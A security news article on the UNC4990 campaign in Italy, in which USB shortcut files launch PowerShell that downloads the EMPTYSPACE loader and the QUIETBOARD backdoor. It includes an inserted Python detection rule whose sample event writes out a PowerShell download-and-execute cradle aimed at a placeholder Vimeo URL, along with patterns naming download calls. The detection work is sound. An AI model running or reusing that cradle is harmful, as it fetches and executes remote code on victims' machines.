Italian Companies Hit by Weaponized USBs Spreading Cryptojacking Malware

A financially motivated threat actor known as UNC4990 uses weaponized USB devices as an initial infection vector to target organizations in Italy.

Google-owned Mandiant said the attacks affected multiple sectors, including healthcare, transportation, construction and logistics.

“UNC4990 operations typically involve a widespread USB infection followed by deployment of the EMPTYSPACE downloader,” the company said in a Tuesday report.

“During these operations, the cluster relies on third-party websites, such as GitHub, Vimeo, and Ars Technica, to host encrypted additional stages, which it downloads and decrypts via PowerShell early in the execution chain.”

UNC4990, active since late 2020, is believed to operate from Italy, based on its extensive use of Italian infrastructure for command-and-control (C2) purposes.

It is currently unknown whether UNC4990 functions solely as an initial access facilitator for other actors. The threat actor’s end goal is also unclear, although in one case an open-source cryptocurrency miner is said to have been deployed after months of beacon activity.

Details of the campaign were previously documented by Fortgale and Yoroi in early December 2023, with the former tracking the adversary under the name Nebula Broker.

The infection starts when a victim double-clicks a malicious LNK shortcut file on a removable USB device, leading to the execution of a PowerShell script that downloads EMPTYSPACE (also known as BrokerLoader or Vetta Loader) from a third-party server via another intermediate PowerShell script hosted on Vimeo.

Yoroi said it identified four different variants of EMPTYSPACE, written in Golang, .NET, Node.js and Python, which act as a conduit for retrieving next-stage payloads over HTTP from the C2 server, including a backdoor called QUIETBOARD.

A notable aspect of this phase is the use of popular sites such as Ars Technica, GitHub, GitLab and Vimeo to host the malicious payload.
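The chain described above (LNK double-clicked on a USB drive, PowerShell launched from explorer.exe, a download cradle pulling a stage from a legitimate content host) gives defenders three observable conditions to correlate in process-creation telemetry. The following is an added detection example, not code from the Mandiant or Yoroi reports; the `ProcessEvent` record, the `removable_media` enrichment flag and the sample events are constructed for illustration, and the host list is taken from the sites named in the article.

```python
import re
from dataclasses import dataclass

# Legitimate content hosts the report says UNC4990 used to stage encrypted payloads.
ABUSED_HOSTS = ("vimeo.com", "github.com", "gitlab.com", "arstechnica.com")
# Common PowerShell download primitives, matched case-insensitively.
DOWNLOAD_CALL = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|Invoke-RestMethod|\biwr\b|\birm\b", re.I)
HOST_IN_CMD = re.compile(
    r"https?://(?:[\w-]+\.)*(" + "|".join(map(re.escape, ABUSED_HOSTS)) + r")", re.I)

@dataclass
class ProcessEvent:
    """Simplified, constructed process-creation record (not a real Sysmon/EDR schema)."""
    image: str
    parent_image: str
    command_line: str
    current_directory: str
    removable_media: bool  # assumed to be enriched from a drive-type lookup of current_directory

def usb_stager_indicators(ev: ProcessEvent) -> list:
    """Return the chain-specific indicators present in one event (empty list = nothing matched)."""
    found = []
    if ev.image.lower().endswith("powershell.exe") and ev.parent_image.lower().endswith("explorer.exe"):
        found.append("powershell.exe spawned by explorer.exe (consistent with a double-clicked LNK)")
    if ev.removable_media:
        found.append("working directory on removable media: " + ev.current_directory)
    host = HOST_IN_CMD.search(ev.command_line)
    if host and DOWNLOAD_CALL.search(ev.command_line):
        found.append("download cradle fetching from abused content host " + host.group(1).lower())
    return found

def is_usb_stager_match(ev: ProcessEvent) -> bool:
    """Alert only when all three conditions hold; any single one alone is routine activity."""
    return len(usb_stager_indicators(ev)) == 3

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed events: one matching the chain, two benign look-alikes
    ProcessEvent(PS, r"C:\Windows\explorer.exe",
                 "powershell.exe -w hidden -c \"IEX (New-Object Net.WebClient)"
                 ".DownloadString('https://vimeo.com/PLACEHOLDER')\"", r"E:\\", True),
    ProcessEvent(PS, r"C:\Windows\explorer.exe",
                 r"powershell.exe -File C:\Scripts\backup.ps1", r"C:\Users\alice", False),
    ProcessEvent(PS, r"C:\Windows\System32\services.exe",
                 "powershell.exe -c \"Invoke-WebRequest https://github.com/org/repo/releases/latest\"",
                 r"C:\agent", False),
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(is_usb_stager_match(ev), usb_stager_indicators(ev))
```

Requiring all three conditions keeps the rule from firing on ordinary scripts or CI agents that legitimately fetch from GitHub, while still surfacing the USB-borne stager the article describes.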

“The content hosted on these services posed no immediate risk to everyday users of these services because the content hosted separately was completely benign,” Mandiant researchers said. “Anyone who accidentally clicked on or viewed this content in the past was not at risk of being hacked.”

QUIETBOARD, on the other hand, is a Python-based backdoor with a wide range of features: it can execute arbitrary commands, modify cryptocurrency wallet addresses copied to the clipboard to redirect fund transfers to attacker-controlled wallets, propagate to removable drives, take screenshots and collect system information.

Furthermore, the backdoor is capable of modular expansion and running independent Python modules such as coin miners, as well as dynamically retrieving and executing Python code from the C2 server.

“The analysis of both EMPTYSPACE and QUIETBOARD suggests how the threat actors took a modular approach to developing their toolset,” Mandiant said.

“The use of multiple programming languages to create different versions of the EMPTYSPACE downloader and the URL change when the Vimeo video was removed show a propensity for experimentation and adaptability on the part of the threat actors.”
